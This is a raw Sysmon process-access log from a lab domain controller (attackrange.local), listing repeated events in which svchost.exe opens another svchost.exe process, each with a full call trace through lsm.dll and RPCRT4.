12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.161{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.145{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 